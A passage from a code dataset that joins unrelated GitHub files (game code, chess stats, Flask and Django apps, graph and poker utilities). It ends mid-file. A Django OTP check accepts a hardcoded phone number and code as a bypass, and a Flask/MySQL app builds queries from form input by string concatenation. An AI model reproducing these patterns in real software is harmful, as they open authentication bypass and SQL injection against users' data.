app.logic.player import Player\nfrom app.scene.parallaxBackground import ParallaxBackground\n\nclass GameScene(Layer):\n def __init__(self, R):\n super(GameScene, self).__init__()\n self.R = R\n self.batch = BatchNode()\n self.collisionManager = CollisionModel.CollisionManagerBruteForce()\n #Main Background\n mainBack = Sprite(R._BACKGROUND[4])\n mainBack.position = (director._window_virtual_width/2, director._window_virtual_height/2)\n self.add(mainBack)\n #Parallax-BackGround\n self.add(ParallaxBackground((0,0,800,600), [R._BACKGROUND[1],R._BACKGROUND[1]], 16, 10))\n self.add(ParallaxBackground((0, 0, 800, 600), [R._BACKGROUND[2], R._BACKGROUND[2]], 4, 10))\n self.add(ParallaxBackground((0, 0, 800, 600), [R._BACKGROUND[3], R._BACKGROUND[3]], 2, 10))\n\n #Add Player\n self.PLAYER = Player()\n self.ENEMY = Enemy()\n self.HUD = HUD()\n\n #set Data\n self.PLAYER.set(self)\n self.ENEMY.set(self)\n self.HUD.set(self)\n\n #Add layers\n self.add(self.PLAYER)\n self.add(self.ENEMY)\n self.add(self.HUD)\n\n #Adding Batch to Layer\n 
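# BatchNode renders any sprites added to it in a single batched draw call\n        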
self.add(self.batch)","repo_name":"bleedweedsuz/Endless-Shooter","sub_path":"app/scene/gameScene.py","file_name":"gameScene.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11530581550","text":"from game import *\n\n#Class for a database of chessgames\nclass Games:\n def __init__(self) -> None:\n self._games : list[Game] = []\n\n # Getters and setters\n @property\n def games(self):\n return self._games\n \n def addGame(self, game : Game):\n self._games.append(game)\n\n # Returns how many games are active after a given number of moves\n def howManyActive(self, moves: int) -> int:\n games = 0\n for g in self.games:\n if int(g.plyCount)//2 > moves:\n games += 1\n return games\n # Same for games where Stockfish played with white pieces\n def howManyActiveW(self, moves: int) -> int:\n games = 0\n for g in self.games:\n if int(g.plyCount)//2 > moves and g.white == \"Stockfish 15 64-bit\":\n games += 1\n return games\n # Same for games where Stockfish played with black pieces\n def howManyActiveB(self, moves: int) -> int:\n games = 0\n for g in self.games:\n if int(g.plyCount)//2 > moves and g.black == \"Stockfish 15 64-bit\":\n games += 1\n return games\n # Returns the max number of moves in a game in the database\n def maxMoves(self) ->int:\n max = 0\n for i in range(len(self.games)):\n if int(self.games[i].plyCount) > max:\n max = self.games[i].plyCount\n return max\n # Counts the openings, so that we can se which openings are most popular\n def countOpenings(self) -> dict:\n openings: dict = {}\n for g in self.games:\n if g.opening not in openings:\n openings[g.opening] = 1\n else:\n openings[g.opening] += 1\n sortedDict = dict(sorted(openings.items(), key=lambda item: item[1], reverse=True))\n return sortedDict\n","repo_name":"vwnorris/stockFishAnalyzer","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74268656162","text":"# Leetcode 977. Squares of a Sorted Array\n#\n# Link: https://leetcode.com/problems/squares-of-a-sorted-array/\n# Difficulty: Easy\n\n# Solution using TwoPointers\n# Complexity:\n# O(N) time | where N represent the number of elements in the input array\n# O(N) space | where N represent the number of elements in the input array\n\nclass Solution:\n def sortedSquares(self, nums: List[int]) -> List[int]:\n\n left, right, = 0, len(nums) - 1\n result = []\n\n while left <= right:\n if abs(nums[left]) > abs(nums[right]):\n result.append(nums[left]**2)\n left += 1\n else:\n result.append(nums[right]**2)\n right -= 1\n\n return result[::-1]\n","repo_name":"edab/LC-Study-Plan","sub_path":"solutions/squares-of-a-sorted-array.py","file_name":"squares-of-a-sorted-array.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15543429402","text":"from flask import current_app as app\nfrom flask import request, render_template\nfrom http import HTTPStatus\nfrom xbox.webapi.authentication.manager import AuthenticationManager,\\\n AuthenticationException, TwoFactorAuthRequired\nfrom . 
import routes\n\n\n@routes.route('/auth')\ndef authentication_overview():\n tokens = {\n 'access_token': app.authentication_mgr.access_token,\n 'refresh_token': app.authentication_mgr.refresh_token,\n 'user_token': app.authentication_mgr.user_token,\n 'xsts_token': app.authentication_mgr.xsts_token\n }\n\n data = {}\n for k, v in tokens.items():\n data.update({k: v.to_dict() if v else None})\n userinfo = app.authentication_mgr.userinfo.to_dict() if app.authentication_mgr.userinfo else None\n\n return app.success(tokens=data, userinfo=userinfo, authenticated=app.authentication_mgr.authenticated)\n\n\n@routes.route('/auth/login')\ndef authentication_login():\n if app.authentication_mgr.authenticated:\n return render_template('auth_result.html',\n title='Already signed in',\n result='Already signed in',\n message='You are already signed in, please logout first!',\n link_path='/auth/logout',\n link_title='Logout')\n else:\n return render_template('login.html')\n\n\n@routes.route('/auth/login', methods=['POST'])\ndef authentication_login_post():\n is_webview = request.form.get('webview')\n email_address = request.form.get('email')\n password = request.form.get('password')\n\n if app.authentication_mgr.authenticated:\n return app.error('An account is already signed in.. please logout first', HTTPStatus.BAD_REQUEST)\n elif not email_address or not password:\n return app.error('No email or password parameter provided', HTTPStatus.BAD_REQUEST)\n\n app.authentication_mgr.email_address = email_address\n app.authentication_mgr.password = password\n\n try:\n app.authentication_mgr.authenticate()\n app.authentication_mgr.dump(app.token_file)\n except AuthenticationException as e:\n if is_webview:\n return render_template('auth_result.html',\n title='Login fail',\n result='Login failed',\n message='Error: {0}!'.format(str(e)),\n link_path='/auth/login',\n link_title='Try again')\n else:\n return app.error('Login failed! 
Error: {0}'.format(str(e)),\n two_factor_required=False)\n\n except TwoFactorAuthRequired:\n if is_webview:\n return render_template('auth_result.html',\n title='Login fail',\n result='Login failed, 2FA required',\n message='Please click the following link to authenticate via OAUTH',\n link_path='/auth/oauth',\n link_title='Login via OAUTH')\n else:\n return app.error('Login failed, 2FA required!',\n two_factor_required=True)\n\n except Exception as e:\n return app.error('Unhandled authentication error: {0}'.format(str(e)),\n two_factor_required=False)\n\n if is_webview:\n return render_template('auth_result.html',\n title='Login success',\n result='Login succeeded',\n message='Welcome {}!'.format(app.logged_in_gamertag),\n link_path='/auth/logout',\n link_title='Logout')\n else:\n return app.success(message='Login success', gamertag=app.logged_in_gamertag)\n\n\n@routes.route('/auth/logout')\ndef authentication_logout():\n if app.authentication_mgr.authenticated:\n return render_template('logout.html', username=app.logged_in_gamertag)\n else:\n return render_template('auth_result.html',\n title='Logout failed',\n result='Logout failed',\n message='You are currently not logged in',\n link_path='/auth/login',\n link_title='Login')\n\n\n@routes.route('/auth/logout', methods=['POST'])\ndef authentication_logout_post():\n is_webview = request.form.get('webview')\n username = app.logged_in_gamertag\n app.reset_authentication()\n if is_webview:\n return render_template('auth_result.html',\n title='Logout success',\n result='Logout succeeded',\n message='Goodbye {0}!'.format(username),\n link_path='/auth/login',\n link_title='Login')\n else:\n return app.success(message='Logout succeeded')\n\n\n@routes.route('/auth/url')\ndef authentication_get_auth_url():\n return app.success(authorization_url=AuthenticationManager.generate_authorization_url())\n\n\n@routes.route('/auth/oauth')\ndef authentication_oauth():\n if app.authentication_mgr.authenticated:\n return render_template('auth_result.html',\n title='Already signed in',\n result='Already signed in',\n message='You are already signed in, please logout first!',\n link_path='/auth/logout',\n link_title='Logout')\n else:\n return render_template('login_oauth.html',\n oauth_url=AuthenticationManager.generate_authorization_url())\n\n\n@routes.route('/auth/oauth', methods=['POST'])\ndef authentication_oauth_post():\n is_webview = request.form.get('webview')\n app.reset_authentication()\n redirect_uri = request.form.get('redirect_uri')\n if not redirect_uri:\n return app.error('Please provide redirect_url', HTTPStatus.BAD_REQUEST)\n\n try:\n access, refresh = AuthenticationManager.parse_redirect_url(redirect_uri)\n app.authentication_mgr.access_token = access\n app.authentication_mgr.refresh_token = refresh\n app.authentication_mgr.authenticate(do_refresh=False)\n app.authentication_mgr.dump(app.token_file)\n except Exception as e:\n if is_webview:\n return render_template('auth_result.html',\n title='Login fail',\n result='Login failed',\n message='Error message: {0}'.format(str(e)),\n link_path='/auth/login',\n link_title='Try again')\n else:\n return app.error('Login failed, error: {0}'.format(str(e)))\n\n if is_webview:\n return render_template('auth_result.html',\n title='Login success',\n result='Login succeeded',\n message='Welcome {}!'.format(app.logged_in_gamertag),\n link_path='/auth/logout',\n link_title='Logout')\n else:\n return app.success(message='Login success', gamertag=app.logged_in_gamertag)\n\n\n@routes.route('/auth/refresh')\ndef 
authentication_refresh():\n try:\n app.authentication_mgr.authenticate(do_refresh=True)\n except Exception as e:\n return app.error(str(e))\n\n return app.success()\n\n\n@routes.route('/auth/load')\ndef authentication_load_from_disk():\n try:\n app.authentication_mgr.load(app.token_file)\n except FileNotFoundError as e:\n return app.error('Failed to load tokens from \\'{0}\\'. Error: {1}'.format(e.filename, e.strerror), HTTPStatus.NOT_FOUND)\n\n return app.success()\n\n\n@routes.route('/auth/store')\ndef authentication_store_on_disk():\n if not app.authentication_mgr.authenticated:\n return app.error('Sorry, no valid authentication for saving was found', HTTPStatus.BAD_REQUEST)\n\n try:\n app.authentication_mgr.dump(app.token_file)\n except Exception as e:\n return app.error('Failed to save tokens to \\'{0}\\'. Error: {1}'.format(app.token_file, str(e)))\n\n return app.success()\n","repo_name":"hixio-mh/xbox-smartglass-core-python","sub_path":"xbox/rest/routes/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":8433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"71587108001","text":"import collections\n\nimport dgl\nfrom dgl.data import PPIDataset\n\nfrom torch.utils.data import DataLoader, Dataset\n\n# implement the collate_fn for dgl graph data class\nPPIBatch = collections.namedtuple(\"PPIBatch\", [\"graph\", \"label\"])\n\n\ndef batcher(device):\n def batcher_dev(batch):\n batch_graphs = dgl.batch(batch)\n return PPIBatch(\n graph=batch_graphs, label=batch_graphs.ndata[\"label\"].to(device)\n )\n\n return batcher_dev\n\n\n# add a fresh \"self-loop\" edge type to the untyped PPI dataset and prepare train, val, test loaders\ndef load_PPI(batch_size=1, device=\"cpu\"):\n train_set = PPIDataset(mode=\"train\")\n valid_set = PPIDataset(mode=\"valid\")\n test_set = PPIDataset(mode=\"test\")\n # for each graph, add self-loops as a new relation type\n # here we reconstruct the graph since the schema of a heterograph cannot be changed once constructed\n for i in range(len(train_set)):\n g = dgl.heterograph(\n {\n (\"_N\", \"_E\", \"_N\"): train_set[i].edges(),\n (\"_N\", \"self\", \"_N\"): (\n train_set[i].nodes(),\n train_set[i].nodes(),\n ),\n }\n )\n g.ndata[\"label\"] = train_set[i].ndata[\"label\"]\n g.ndata[\"feat\"] = train_set[i].ndata[\"feat\"]\n g.ndata[\"_ID\"] = train_set[i].ndata[\"_ID\"]\n g.edges[\"_E\"].data[\"_ID\"] = train_set[i].edata[\"_ID\"]\n train_set.graphs[i] = g\n for i in range(len(valid_set)):\n g = dgl.heterograph(\n {\n (\"_N\", \"_E\", \"_N\"): valid_set[i].edges(),\n (\"_N\", \"self\", \"_N\"): (\n valid_set[i].nodes(),\n valid_set[i].nodes(),\n ),\n }\n )\n g.ndata[\"label\"] = valid_set[i].ndata[\"label\"]\n g.ndata[\"feat\"] = valid_set[i].ndata[\"feat\"]\n g.ndata[\"_ID\"] = valid_set[i].ndata[\"_ID\"]\n g.edges[\"_E\"].data[\"_ID\"] = valid_set[i].edata[\"_ID\"]\n valid_set.graphs[i] = g\n for i in range(len(test_set)):\n g = dgl.heterograph(\n {\n (\"_N\", \"_E\", \"_N\"): test_set[i].edges(),\n (\"_N\", \"self\", \"_N\"): (\n test_set[i].nodes(),\n test_set[i].nodes(),\n ),\n }\n )\n g.ndata[\"label\"] = test_set[i].ndata[\"label\"]\n g.ndata[\"feat\"] = test_set[i].ndata[\"feat\"]\n g.ndata[\"_ID\"] = test_set[i].ndata[\"_ID\"]\n g.edges[\"_E\"].data[\"_ID\"] = test_set[i].edata[\"_ID\"]\n test_set.graphs[i] = g\n\n etypes = train_set[0].etypes\n in_size = train_set[0].ndata[\"feat\"].shape[1]\n out_size = train_set[0].ndata[\"label\"].shape[1]\n\n # prepare train, valid, and test 
dataloaders\n train_loader = DataLoader(\n train_set,\n batch_size=batch_size,\n collate_fn=batcher(device),\n shuffle=True,\n )\n valid_loader = DataLoader(\n valid_set,\n batch_size=batch_size,\n collate_fn=batcher(device),\n shuffle=True,\n )\n test_loader = DataLoader(\n test_set,\n batch_size=batch_size,\n collate_fn=batcher(device),\n shuffle=True,\n )\n return train_loader, valid_loader, test_loader, etypes, in_size, out_size\n","repo_name":"dmlc/dgl","sub_path":"examples/pytorch/GNN-FiLM/data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"13108134672","text":"import unittest\n\n\"\"\"\nGraph must be a DAG (directed acyclic graph), basically a directed graph with no cycle\n1. Start with a random node in graph\n2. Go to the end of the path that starts from above node. If current node has no un-visited adjacent nodes then add it \nto the stack. Doing this will make sure node that has no dependent nodes on it is added to stack.\n3. Repeat step 1, 2 until no un-visited nodes\n4. Return reversed stack\n\"\"\"\n\n\nclass Graph:\n def __init__(self):\n self.adj_list = {}\n\n def add_edge(self, u, v):\n if u not in self.adj_list.keys():\n self.adj_list[u] = []\n\n self.adj_list[u].append(v)\n\n def add_vertex(self, u):\n self.adj_list[u] = []\n\n def topological_sort(self):\n visited = set()\n stack = []\n\n for node in self.adj_list.keys():\n if node not in visited:\n self.helper(visited, stack, node)\n\n stack.reverse()\n\n return stack\n\n def helper(self, visited, stack, node):\n visited.add(node)\n # DFS traversal\n if node in self.adj_list.keys():\n for adj_node in self.adj_list[node]:\n if adj_node not in visited:\n self.helper(visited, stack, adj_node)\n\n # when all adjacent nodes are visited, add it to stack\n stack.append(node)\n\n\nclass Test(unittest.TestCase):\n\n def test_topological_sort(self):\n graph = Graph()\n graph.add_edge(\"G\", \"H\")\n graph.add_edge(\"A\", \"H\")\n graph.add_edge(\"A\", \"B\")\n graph.add_edge(\"B\", \"C\")\n graph.add_edge(\"C\", \"F\")\n graph.add_edge(\"D\", \"E\")\n graph.add_edge(\"E\", \"F\")\n graph.add_vertex(\"I\")\n expected_result = [\"I\", \"D\", \"E\", \"A\", \"B\", \"C\", \"F\", \"G\", \"H\"]\n self.assertEqual(graph.topological_sort(), expected_result,\n \"Should return correct result for string topological sort\")\n\n graph1 = Graph()\n graph1.add_edge(5, 0)\n graph1.add_edge(5, 2)\n graph1.add_edge(2, 3)\n graph1.add_edge(3, 1)\n graph1.add_edge(4, 0)\n graph1.add_edge(4, 1)\n expected_result_1 = [4, 5, 2, 3, 1, 0]\n self.assertEqual(graph1.topological_sort(), expected_result_1,\n \"Should return correct result for number topological sort\")\n","repo_name":"DKNY1201/programming-python","sub_path":"Sorting/TopologicalSort.py","file_name":"TopologicalSort.py","file_ext":"py","file_size_in_byte":2327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26504859290","text":"# -*-coding:Utf-8 -*-\n\nclass Position():\n\t\"\"\" ligne et colonne de l'élément.\n\t(0, 0) est le coin en haut à gauche\"\"\"\n\tdef __init__(self, ligne, colonne):\n\t\tself.ligne = ligne\n\t\tself.colonne = colonne\n\n\tdef __repr__(self):\n\t\treturn \"({}, {})\".format(self.ligne, self.colonne)\n\n\tdef add(self, direction):\n\t\t\"\"\"Just for fun.\n\t\tUsage : position.add(\"n\")\"\"\"\n\t\tif direction == \"n\":\n\t\t\tself.ligne -= 1\n\t\telif 
direction == \"s\":\n\t\t\tself.ligne += 1\n\t\telif direction == \"e\":\n\t\t\tself.colonne += 1\n\t\telif direction == \"o\":\n\t\t\tself.colonne -= 1","repo_name":"kerhuon/robot1","sub_path":"position.py","file_name":"position.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2324758638","text":"import datetime\nimport logging\n\nfrom .models import UserCode\nimport random\nfrom .enums import StatusUserCode\nfrom ..models import User\n\n\nclass CreateUserCodeAction:\n\n @staticmethod\n def run(user):\n return UserCode.objects.create(user=user, otp=random.randint(1000, 9999))\n\n\nclass GetStatusUserCodeAction:\n\n @staticmethod\n def run(user: User, otp: str):\n otp_object = UserCode.objects.filter(user=user,\n otp=otp).order_by('created_at').last()\n\n if user.phone == '77777777777' and otp == '7899':\n return StatusUserCode.SUCCESS\n\n if otp_object is not None:\n try:\n now = datetime.datetime.now(datetime.timezone.utc)\n created_at = otp_object.created_at\n difference = now - created_at\n minutes = difference.total_seconds() / 60\n if minutes < 5:\n return StatusUserCode.SUCCESS\n else:\n return StatusUserCode.TIMEOUT\n\n except Exception as e:\n logging.exception(e)\n return StatusUserCode.INVALID_CODE\n else:\n return StatusUserCode.NOT_CREATED\n","repo_name":"BakdauletBolat/taxiback","sub_path":"apps/users/usercode/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15475762319","text":"from flask import Flask, render_template, request\r\nfrom flask_mysqldb import MySQL\r\n\r\n\r\napp = Flask(__name__)\r\n\r\napp.config['MYSQL_HOST']='localhost'\r\napp.config['MYSQL_USER']='root'\r\napp.config['MYSQL_PASSWORD']=''\r\napp.config['MYSQL_DB']='artgallery'\r\n\r\nmysql = MySQL(app)\r\n \r\n@app.route('/')\r\ndef root():\r\n return render_template('index.html')\r\n\r\n@app.route('/display',methods=['GET', 'POST'])\r\ndef display():\r\n if request.method == \"POST\":\r\n details = request.form\r\n state = details['stateAb']\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"SELECT C.* FROM CUSTOMER AS C, STATE AS S WHERE S.stateAb=C.stateAb AND S.stateAb='\"+state+\"'\")\r\n result = cur.fetchall()\r\n mysql.connection.commit()\r\n cur.close()\r\n return render_template('display.html',result= result)\r\n\r\n@app.route('/insert', methods = ['GET', 'POST'])\r\ndef insert():\r\n if request.method == \"POST\":\r\n details = request.form\r\n stateab = details['stateab']\r\n state = details['statename']\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"INSERT INTO state(stateAb, stateName) VALUES(%s, %s)\",(stateab, state))\r\n mysql.connection.commit()\r\n cur.close()\r\n return 'success'\r\n return render_template('index.html')\r\n\r\n@app.route('/update', methods = ['GET', 'POST'])\r\ndef update():\r\n if request.method == 'POST':\r\n details = request.form\r\n stateab = details['stateab']\r\n state = details['statename']\r\n cur = mysql.connection.cursor()\r\n cur.execute(\"UPDATE state SET stateAb='\"+stateab+\"' WHERE stateName='\"+state+\"'\")\r\n mysql.connection.commit()\r\n cur.close()\r\n return 'success'\r\n return render_template('index.html')\r\n\r\n@app.route('/delete', methods = ['GET', 'POST'])\r\ndef delete():\r\n if request.method == 'POST':\r\n details = request.form\r\n state = details['statename']\r\n cur = 
mysql.connection.cursor()\r\n cur.execute(\"DELETE FROM state WHERE stateName='\"+state+\"'\")\r\n mysql.connection.commit()\r\n cur.close()\r\n return 'success'\r\n return render_template('index.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n\r\n","repo_name":"SumaitaSabaha/Database","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24531491364","text":"import os\nimport django\nimport json\nfrom pathlib import Path\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"hw10_project.settings\")\ndjango.setup()\n\nfrom quotes.models import Quote, Tag, Author\n\ndef load_json(filename):\n with open(filename, \"r\", encoding='utf-8') as file:\n data = json.load(file)\n return data\n\ndef load_data():\n a_list = {}\n pathname = Path(__file__).resolve().parent\n authors = load_json(pathname.joinpath('data/authors.json'))\n for auth in authors:\n fn = auth.get(\"fullname\")\n bd = auth.get(\"born_date\")\n author, *_ = Author.objects.get_or_create(\n fullname = fn,\n born_date = bd,\n born_location = auth.get(\"born_location\"),\n description = auth.get(\"description\")\n )\n a_list.update({fn: author})\n \n quotes = load_json(pathname.joinpath('data/quotes.json'))\n for quot in quotes:\n tags = []\n for tag in quot.get('tags'):\n t, *_ = Tag.objects.get_or_create(name=tag)\n tags.append(t)\n\n q1 = quot.get(\"quote\")\n exists_quote = bool(len(Quote.objects.filter(quote=q1)))\n if not exists_quote:\n auth = a_list.get(quot.get(\"author\"))\n quote = Quote.objects.create(\n quote = q1,\n author = auth\n )\n for tag in tags:\n quote.tags.add(tag)\n\n\nif __name__ == '__main__':\n load_data()\n","repo_name":"NikYurchik/Tutorial","sub_path":"DZ2-10/hw10_project/utils/migration.py","file_name":"migration.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72999008803","text":"import pygame\nimport sys\n\n\ndef update_score(ball, bar, score):\n \"\"\"This is check the score and increase it every time the bar and ball touch\"\"\"\n if bar.y <= ball.y <= (bar.y + bar.height):\n if ball.x <= bar.x < (ball.x + ball.radius) or bar.x <= ball.x < (bar.x + bar.width):\n score += 1\n return score\n\n\ndef check_events(bar):\n \"\"\"This will be the main checker of user input and make the necessary adjustments to the bar\"\"\"\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RIGHT:\n bar.moving_right = True\n elif event.key == pygame.K_LEFT:\n bar.moving_left = True\n elif event.type == pygame.KEYUP:\n if event.key == pygame.K_RIGHT:\n bar.moving_right = False\n elif event.key == pygame.K_LEFT:\n bar.moving_left = False\n","repo_name":"FruitPunchSamurai1961/Breakout_Game","sub_path":"game_functions.py","file_name":"game_functions.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34346658386","text":"import pandas as pd\nimport warnings\nimport xlsxwriter\n\n\nwarnings.filterwarnings('ignore')\n\n\ndef read_excel(excel_path: str) -> pd.core.frame.DataFrame:\n df = pd.read_excel(excel_path)\n extracted_data = df.ix[:, [\"受试者\", '图像数据ID', '组别', '性别', '年龄', '获取日期', '受教育程度', '婚姻状况', 'APOE4', '简易精神状态检查表MMSE']]\n # , '问答情况FAQ'\n return extracted_data\n\n\ndef 
write_excel(excel_path: str, save_data: pd.core.frame.DataFrame):\n # file = xlwt.Workbook()\n # sheet = file.add_sheet('ADClinical', cell_overwrite_ok=True)\n # row0 = [\"受试者\", '图像ID', '组别', '性别', '年龄', '获取日期', '受教育程度', '婚姻状况', 'APOE4', '简易精神状态检查表MMSE', '问答情况FAQ']\n\n STYLE_HEADER = {'font_size': 9, 'border': 1, 'bold': 1, 'bg_color': '#B4C6E7', 'align': 'center',\n 'valign': 'vcenter'}\n STYLE_TEXT = {'font_size': 9, 'border': 1}\n STYLE_NUMBER = {'font_size': 9, 'border': 1, 'num_format': '0.00'}\n workbook = xlsxwriter.Workbook(excel_path)\n style_header = workbook.add_format(STYLE_HEADER)\n style_text = workbook.add_format(STYLE_TEXT)\n style_number = workbook.add_format(STYLE_NUMBER)\n AD_sheet = workbook.add_worksheet(\"ADClinical\")\n header = [\"受试者\", '图像数据ID', '组别', '性别', '年龄', '获取日期', '受教育程度', '婚姻状况', 'APOE4', '简易精神状态检查表MMSE']\n # , '问答情况FAQ'\n AD_sheet.write_row('A1', header, style_header)\n # 宽度设定\n widths = [15, 15, 15, 15, 15, 15, 15, 15, 15, 15]\n for ind, wid in enumerate(widths):\n AD_sheet.set_column(ind, ind, wid)\n for i in range(len(save_data)):\n AD_sheet.write(i + 1, 0, save_data.iloc[i, 0], style_number)\n AD_sheet.write(i + 1, 1, save_data.iloc[i, 1], style_number)\n AD_sheet.write(i + 1, 2, save_data.iloc[i, 2], style_text)\n AD_sheet.write(i + 1, 3, save_data.iloc[i, 3], style_text)\n AD_sheet.write(i + 1, 4, save_data.iloc[i, 4], style_number)\n AD_sheet.write(i + 1, 5, save_data.iloc[i, 5], style_number)\n AD_sheet.write(i + 1, 6, save_data.iloc[i, 6], style_number)\n AD_sheet.write(i + 1, 7, save_data.iloc[i, 7], style_text)\n AD_sheet.write(i + 1, 8, save_data.iloc[i, 8], style_number)\n AD_sheet.write(i + 1, 9, save_data.iloc[i, 9], style_number)\n workbook.close()\n\n\nif __name__ == '__main__':\n path = r\"D:\\data\\clinicalData\\fromZJ.xlsx\"\n write_path = r\"D:\\data\\clinicalData\\clinicalData.xlsx\"\n data = read_excel(path)\n write_excel(write_path, data)\n # write(write_path)\n","repo_name":"ETVP/AD-diagnosis","sub_path":"ori/excelExtract.py","file_name":"excelExtract.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"20067067836","text":"N = int(input())\n\nlist = []\ntenho = 0\n\nfor i in range(N):\n S = input()\n\n if(S in list):\n tenho += 1\n else:\n list.append(S)\n\n\n print(list)\n\nprint(f'Falta(m) {151-len(list)} pomekon(s).')\n","repo_name":"OrnanKeivison/ProvaTalAlgoritmos","sub_path":"Questao3.py","file_name":"Questao3.py","file_ext":"py","file_size_in_byte":212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3643455695","text":"'''\n(Count positive and negative numbers and compute the average of numbers)\n\nWrite a program that reads an unspecified number of integers, determines how many positive and negative values have been read, and computes the total and average of the input values (not counting zeros). Your program ends with the input 0. 
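(For example, the inputs 1, 2, -1, 3, 0 give 3 positive values, 1 negative value, a total of 5 and an average of 5 / 4 = 1.25.) 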
Display the average as a floating-point number.\n\nSample Run 1\n\nSample Output 1:\n\nEnter an integer, the input ends if it is 0: 1\n\nEnter an integer, the input ends if it is 0: 2\n\nEnter an integer, the input ends if it is 0: -1\n\nEnter an integer, the input ends if it is 0: 3\n\nEnter an integer, the input ends if it is 0: 0\n\nThe number of positives is 3\n\nThe number of negatives is 1\n\nThe total is 5\n\nThe average is 1.25\n\nSample Run 2\n\nSample Output 2:\n\nEnter an integer, the input ends if it is 0: 0\n\nNo numbers are entered except 0\n'''\n\nnum = int(input(\"Enter an integer, the input ends if it is 0: \"))\npos = 0\nneg = 0\ncount = 0\ntot = num\nif num > 0:\n pos+=1\nelif num < 0:\n neg+=1\nelif num == 0:\n print(\"No numbers are entered except 0\")\n quit()\n\nwhile num != 0:\n num = int(input(\"Enter an integer, the input ends if it is 0: \"))\n if num > 0:\n pos += 1\n elif num < 0:\n neg += 1\n count += 1\n tot += num\navg = tot/ count\nprint(\"The number of positives is: \", pos)\nprint(\"The number of negatives is: \", neg)\nprint(\"The total is\", tot)\nprint(\"The average is\", avg)\n","repo_name":"milnorms/pearson_revel","sub_path":"ch5/ch5p1.py","file_name":"ch5p1.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12478163638","text":"\nimport itertools, re\nfrom PtCard import Card\nfrom PtHand import Hand\nfrom PtDeck import Deck\nfrom PtHandTypesHoldem import (\n\t\tgenHandTypes, \n\t\tgenHandTypeTable,\n\t\thandTypeToHands, \n\t\thandTypeFromHand,\n\t\thandTypeIsPair,\n\t\thandTypeIsSuited,\n\t\t)\n#************************************************************************************\n#\n#************************************************************************************\n#NOTE: neither is this beast below 100% compatible to PokerTracker nor is it tested\n# in any depth.\nclass HandRangeHoldem(object):\n\t\"\"\"wrapper class for texas holdem hand ranges\n\t\n\tyou may initialize this class directly with a list of L{Hands}s or use the L{fromString}\n\tmethod to create a hand range from a standard hand range pattern. 
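For example, fromString('TT+, ATs+, KQo') yields every pair tens or higher, the suited aces ace-ten through ace-king and the offsuit king-queen combinations. 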
recognized patterns are:\n\t\n\trandom: all hands\n\tJhTd: a specific card\n\tAA: a pair\n\tTT+: all pairs ten or higher\n\t77-KK: all pairs 77 to KK\n\tKTs, KTo, KT: all suited, offsuit king ten combinations\n\tK6s+, K6o+, K6+: all suited, offsuit kings, king 6 to king jack\n\tKTs-K2s, KTo-K2o, KT-K2: all suited, offsuit king combinations king deuce to king ten\n\t\n\tseparate patterns by comma to form complex ranges: 'AA-99, ATs+, AJo+, 56s, 7h2c'\n\t\n\t@note: the KT (no suit qualifier) types are special to this implementation and\n\tonly recognized on input.\n\t\"\"\"\n\t\n\tclass ParseError(Exception): pass\n\t\n\tReRanks = '|'.join(Card.RankNames)\n\tReSuits = '|'.join(Card.SuitNames)\n\tReCard = '(%s)(%s)' % (ReRanks, ReSuits)\n\tPatHand = re.compile('''\n\t\t\t\t\t\\A\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t\\Z\n\t\t\t\t\t''' % (ReCard, ReCard), re.X)\n\tPatHandTypePair = re.compile('''\n\t\t\t\t\t\\A\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P=rank)\n\t\t\t\t\t(?P\\+)?\n\t\t\t\t\t\\Z\n\t\t\t\t\t''' % ReRanks, re.X)\n\tPatHandTypePairRange = re.compile('''\n\t\t\t\t\t\\A(?P%s)\n\t\t\t\t\t(?P=rank1)\n\t\t\t\t\t\\-\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P=rank2)\n\t\t\t\t\t\\Z\n\t\t\t\t\t''' % (ReRanks, ReRanks), re.X)\n\tPatHandTypeSuit = 